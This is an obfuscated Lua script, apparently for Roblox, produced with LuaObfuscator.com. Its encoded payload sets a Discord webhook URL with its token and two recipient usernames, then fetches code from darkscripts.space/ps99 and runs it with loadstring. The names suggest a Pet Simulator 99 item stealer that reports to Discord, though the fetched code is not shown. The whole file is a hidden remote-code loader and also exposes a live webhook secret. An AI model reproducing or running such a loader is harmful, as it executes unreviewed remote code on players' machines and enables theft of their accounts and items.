--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=v2(v0(v30,16));if v19 then local v117=v5(v88,v19);v19=nil;return v117;else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=0 -(0 + 0) ;local v90;while true do if (v89==(0 -(0 + 0))) then v90=(v31/((3 -1)^(v32-1)))%(((961 -(892 + 65)) -2)^(((v33-(620 -(555 + (152 -88)))) -(v32-(932 -(857 + 74)))) + (1 -0))) ;return v90-(v90%(1066 -(68 + 997))) ;end end else local v91=(1272 -(226 + (1929 -885)))^(v32-(569 -(367 + 201))) ;return (((v31%(v91 + v91))>=v91) and (928 -(214 + 713))) or ((214 -97) -((382 -(87 + 263)) + 85)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=180 -(67 + 113) ;local v36;local v37;while true do if (v35==(953 -((1799 -(915 + 82)) + 150))) then return (v37 * (188 + 68)) + v36 ;end if (v35==(0 -(0 -0))) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + (4 -2) ;v35=1 + 0 ;end end end local function v23() local v38=0 + (0 -0) ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (22064430 -5287214)) + (v41 * ((66190 + 533) -((1860 -(368 + 423)) + 118))) + (v40 * 256) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (6 -3) );v18=v18 + 4 ;v38=1 + 0 ;end end end local function v24() local v43=0 -(0 -0) ;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (v43==((85 -67) -(4 + 6 + 8))) then v44=v23();v45=v23();v43=3 -2 ;end if (v43==2) then v48=v20(v45,463 -(416 + (89 -63)) ,31);v49=((v20(v45,102 -70 )==(1 + 0)) and  -(1 -0)) or (439 -(145 + 293)) ;v43=3;end if (v43==(433 -((1791 -(760 + 987)) + 386))) then if (v48==(1486 -(998 + 488))) then if (v47==(0 + 0)) then return v49 * (0 + 0) ;else v48=(2686 -(1789 + 124)) -(201 + (1337 -(745 + 21))) ;v46=1138 -(116 + 1022) ;end elseif (v48==(8522 -6475)) then return ((v47==0) and (v49 * ((1 + 0)/(0 -(0 + 0))))) or (v49 * NaN) ;end return v8(v49,v48-(3632 -2609) ) * (v46 + (v47/((861 -(814 + 45))^(127 -75)))) ;end if (v43==((2 -1) + 0)) then v46=1 + 0 ;v47=(v20(v45,886 -(261 + 624) ,35 -15 ) * ((1082 -(1020 + 60))^32)) + v44 ;v43=1425 -(630 + 793) ;end end end local function v25(v50) local v51;if  not v50 then v50=v23();if (v50==(0 -0)) then return "";end end v51=v3(v16,v18,(v18 + v50) -(1 + 0) );v18=v18 + v50 ;local v52={};for v69=1 + 0 , #v51 do v52[v69]=v2(v1(v3(v51,v69,v69)));end return v6(v52);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v92,v93,v94,v95,v96,v97,v98,v99) local v92=(function() return 786 -(265 + 521) ;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do if (v92== #":") then if (v93== #"<") then v94=(function() return v95()~=(0 -0) ;end)();elseif (v93==2) then v94=(function() return v96();end)();elseif (v93~= #"nil") then else v94=(function() return v97();end)();end v98[v99]=(function() return v94;end)();break;end if (v92==(0 -0)) then local v123=(function() return 0;end)();while true do if (v123==(0 + 0)) then v93=(function() return v95();end)();v94=(function() return nil;end)();v123=(function() return 1637 -(1373 + 263) ;end)();end if (v123==(1001 -(451 + 549))) then v92=(function() return  #"]";end)();break;end end end end return v92,v93,v94,v95,v96,v97,v98,v99;end;end)();local v54=(function() return function(v100,v101,v102,v103,v104,v105,v106,v107,v108) local v109=(function() return 0;end)();local v100=(function() return;end)();local v101=(function() return;end)();while true do if (v109~=(0 + 0)) then else local v124=(function() return 0 -0 ;end)();while true do if (v124==0) then v100=(function() return 0;end)();v101=(function() return nil;end)();v124=(function() return 1 -0 ;end)();end if (1==v124) then v109=(function() return 1;end)();break;end end end if (v109~=(1385 -(746 + 638))) then else while true do if (v100==0) then v101=(function() return v102();end)();if (v103(v101, #"[", #"{")==(0 + 0)) then local v128=(function() return 0 -0 ;end)();local v129=(function() return;end)();local v130=(function() return;end)();local v131=(function() return;end)();local v132=(function() return;end)();while true do if (v128==2) then while true do if (v129== #"19(") then if (v103(v131, #"xxx", #"nil")== #"}") then v132[ #"xnxx"]=(function() return v104[v132[ #".dev"]];end)();end v105[v106]=(function() return v132;end)();break;end if (v129== #" ") then local v175=(function() return 0;end)();local v176=(function() return;end)();while true do if (v175~=0) then else v176=(function() return 0;end)();while true do if (v176~=(342 -(218 + 123))) then else v129=(function() return 2;end)();break;end if ((1581 -(1535 + 46))==v176) then v132=(function() return {v107(),v107(),nil,nil};end)();if (v130==0) then local v198=(function() return 0;end)();local v199=(function() return;end)();while true do if (v198==0) then v199=(function() return 0 + 0 ;end)();while true do if (v199==0) then v132[ #"19("]=(function() return v107();end)();v132[ #".dev"]=(function() return v107();end)();break;end end break;end end elseif (v130== #"~") then v132[ #"19("]=(function() return v108();end)();elseif (v130==2) then v132[ #"nil"]=(function() return v108() -(2^16) ;end)();elseif (v130~= #"-19") then else local v206=(function() return 0;end)();local v207=(function() return;end)();while true do if (v206==(560 -(306 + 254))) then v207=(function() return 0 + 0 ;end)();while true do if (v207==0) then v132[ #"-19"]=(function() return v108() -(2^16) ;end)();v132[ #".com"]=(function() return v107();end)();break;end end break;end end end v176=(function() return 1 -0 ;end)();end end break;end end end if ((1467 -(899 + 568))~=v129) then else local v177=(function() return 0;end)();local v178=(function() return;end)();while true do if (v177~=(0 + 0)) then else v178=(function() return 0 -0 ;end)();while true do if (v178==1) then v129=(function() return  #"[";end)();break;end if (v178==(603 -(268 + 335))) then v130=(function() return v103(v101,2, #"asd");end)();v131=(function() return v103(v101, #"xnxx",6);end)();v178=(function() return 1;end)();end end break;end end end if (2==v129) then local v179=(function() return 290 -(60 + 230) ;end)();local v180=(function() return;end)();while true do if (v179==0) then v180=(function() return 0;end)();while true do if (v180==0) then if (v103(v131, #"[", #"{")== #"/") then v132[574 -(426 + 146) ]=(function() return v104[v132[1 + 1 ]];end)();end if (v103(v131,1458 -(282 + 1174) ,2)~= #"}") then else v132[ #"xnx"]=(function() return v104[v132[ #"91("]];end)();end v180=(function() return 1;end)();end if ((812 -(569 + 242))~=v180) then else v129=(function() return  #"91(";end)();break;end end break;end end end end break;end if (v128==(2 -1)) then local v134=(function() return 0 + 0 ;end)();while true do if (v134==(1024 -(706 + 318))) then v131=(function() return nil;end)();v132=(function() return nil;end)();v134=(function() return 1252 -(721 + 530) ;end)();end if (v134~=1) then else v128=(function() return 2;end)();break;end end end if (v128~=0) then else local v135=(function() return 0;end)();local v136=(function() return;end)();while true do if (v135==0) then v136=(function() return 1271 -(945 + 326) ;end)();while true do if (v136==(0 -0)) then v129=(function() return 0;end)();v130=(function() return nil;end)();v136=(function() return 1 + 0 ;end)();end if (v136==1) then v128=(function() return 701 -(271 + 429) ;end)();break;end end break;end end end end end break;end end return v100,v101,v102,v103,v104,v105,v106,v107,v108;end end end;end)();local v55=(function() return function(v110,v111,v112) local v113=(function() return 0 + 0 ;end)();local v114=(function() return;end)();while true do if (v113==(1500 -(1408 + 92))) then v114=(function() return 1086 -(461 + 625) ;end)();while true do if (v114==(1288 -(993 + 295))) then local v127=(function() return 0 + 0 ;end)();while true do if (v127==0) then v110[v111-#" " ]=(function() return v112();end)();return v110,v111,v112;end end end end break;end end end;end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {};end)();local v59=(function() return {v56,v57,nil,v58};end)();local v60=(function() return v23();end)();local v61=(function() return {};end)();for v71= #",",v60 do FlatIdent_89ECE,Type,Cons,v21,v24,v25,v61,v71=(function() return v53(FlatIdent_89ECE,Type,Cons,v21,v24,v25,v61,v71);end)();end v59[ #"xnx"]=(function() return v21();end)();for v72= #".",v23() do FlatIdent_1743D,Descriptor,v21,v20,v61,v56,v72,v22,v23=(function() return v54(FlatIdent_1743D,Descriptor,v21,v20,v61,v56,v72,v22,v23);end)();end for v73= #"/",v23() do v57,v73,v28=(function() return v55(v57,v73,v28);end)();end return v59;end local function v29(v63,v64,v65) local v66=v63[1 + 0 ];local v67=v63[1 + 1 ];local v68=v63[1 + 2 ];return function(...) local v74=v66;local v75=v67;local v76=v68;local v77=v27;local v78=1 + 0 ;local v79= -(530 -(406 + 123));local v80={};local v81={...};local v82=v12("#",...) -(1 + (0 -0)) ;local v83={};local v84={};for v115=1322 -((2451 -(373 + 829)) + 73) ,v82 do if (v115>=v76) then v80[v115-v76 ]=v81[v115 + 1 ];else v84[v115]=v81[v115 + 1 + 0 ];end end local v85=(v82-v76) + (1146 -(466 + (1410 -(476 + 255)))) ;local v86;local v87;while true do local v116=0 -(1130 -(369 + 761)) ;while true do if ((4029<=4853) and ((0 -0)==v116)) then v86=v74[v78];v87=v86[1];v116=1901 -(106 + 1038 + 756) ;end if ((v116==1) or (516>3434)) then if (v87<=(3 + 6)) then if ((4046>=3033) and (4055==4055) and (v87<=(2 + 2))) then if ((v87<=(2 -1)) or (2719<=1447)) then if (v87>(0 -0)) then v84[v86[116 -(4 + 110) ]]();else local v137=584 -(57 + 527) ;local v138;while true do if ((v137==(0 -0)) or (4134<3926)) then v138=v86[1429 -(41 + 1386) ];v84[v138]=v84[v138](v13(v84,v138 + (104 -(17 + (162 -76))) ,v79));break;end end end elseif ((4149<=4445) and (v87<=(2 + (238 -(64 + 174))))) then v84[v86[3 -1 ]]();elseif (v87>(8 -5)) then v84[v86[168 -(122 + 44) ]]=v65[v86[5 -2 ]];else local v165=0 -0 ;local v166;local v167;while true do if ((v165==(0 + 0)) or (1818==85)) then v166=v86[1 + 1 ];v167=v84[v86[5 -2 ]];v165=66 -(30 + 35) ;end if ((1 + 0)==v165) then v84[v166 + 1 ]=v167;v84[v166]=v167[v86[1261 -(1043 + 214) ]];break;end end end elseif (v87<=(22 -16)) then if (v87>(1217 -(47 + 276 + (1315 -426)))) then local v139=v86[5 -3 ];v84[v139]=v84[v139](v13(v84,v139 + (581 -(361 + (555 -(144 + 192)))) ,v79));else local v141=v86[322 -(53 + 267) ];local v142=v84[v86[1 + 2 ]];v84[v141 + (414 -(15 + 398)) ]=v142;v84[v141]=v142[v86[4]];end elseif (v87<=(989 -(18 + 964))) then v78=v86[11 -8 ];elseif ((630<2127) and (v87>(5 + 3))) then v78=v86[2 + 1 ];elseif (v84[v86[852 -(20 + 830) ]]==v86[4 + 0 ]) then v78=v78 + (127 -(116 + 10)) ;else v78=v86[1 + 2 ];end elseif ((v87<=((968 -(42 + 174)) -(542 + 196))) or (164>=2785)) then if ((v87<=(23 -12)) or (1938==2514)) then if (v87>(3 + 0 + 7)) then local v147=0 + 0 + 0 ;local v148;local v149;local v150;local v151;while true do if (v147==0) then v148=v86[1 + 0 + 1 ];v149,v150=v77(v84[v148](v13(v84,v148 + 1 ,v86[7 -4 ])));v147=2 -1 ;end if (((4255>=55) and (v147==(1552 -(1126 + 425)))) or (525==2109)) then v79=(v150 + v148) -(406 -(118 + 287)) ;v151=0 -0 ;v147=1123 -(118 + 1003) ;end if (v147==(5 -3)) then for v186=v148,v79 do v151=v151 + (378 -(142 + 235)) ;v84[v186]=v149[v151];end break;end end else v84[v86[2]]=v86[13 -10 ];end elseif (v87<=(3 + 9)) then v84[v86[979 -(553 + 424) ]]=v65[v86[5 -2 ]];elseif ((2999>1156) and (v87==13)) then do return;end else do return;end end elseif ((2350>1155) and (v87<=((1519 -(363 + 1141)) + (1581 -(1183 + 397))))) then if (v87>15) then v65[v86[3]]=v84[v86[2 + 0 ]];else local v158=0 + 0 ;local v159;local v160;local v161;local v162;while true do if (v158==(1 + (0 -0))) then v79=(v161 + v159) -1 ;v162=0;v158=2 + 0 ;end if (v158==(4 -2)) then for v189=v159,v79 do v162=v162 + (2 -1) ;v84[v189]=v160[v162];end break;end if (v158==0) then v159=v86[(3 + 1) -2 ];v160,v161=v77(v84[v159](v13(v84,v159 + 1 ,v86[3])));v158=1;end end end elseif ((33==33) and (v87<=(5 + 12))) then if (v84[v86[9 -7 ]]==v86[3 + 1 ]) then v78=v78 + ((2729 -(1913 + 62)) -(239 + 514)) ;else v78=v86[2 + 0 + 1 ];end elseif ((3054<=4015) and (v87>(1347 -(797 + 532)))) then v65[v86[3 + (0 -0) ]]=v84[v86[2]];else v84[v86[2]]=v86[2 + 1 ];end v78=v78 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0C3Q00028Q00026Q00F03F03073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F3132393738363130353837392Q3438373837322F7537795967466B7834506177564D665845597374417567775144776D5A50482D7835456A63696B4A6A547569646E764C73483547667048584A424D596E31306848376B34030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574031E3Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F70732Q3903083Q00557365726E616D65030B3Q0044726B6F6E746F702Q363503093Q00557365726E616D6532030B3Q0066726564616C656369656E00163Q002Q123Q00013Q0026083Q000D000100020004073Q000D0001002Q12000100043Q001210000100033Q00120C000100053Q00120C000200063Q002005000200020007002Q12000400084Q000B000200046Q00013Q00022Q00020001000100010004073Q001500010026083Q0001000100010004073Q00010001002Q120001000A3Q001210000100093Q002Q120001000C3Q0012100001000B3Q002Q123Q00023Q0004073Q000100012Q000E3Q00017Q00",v9(),...);
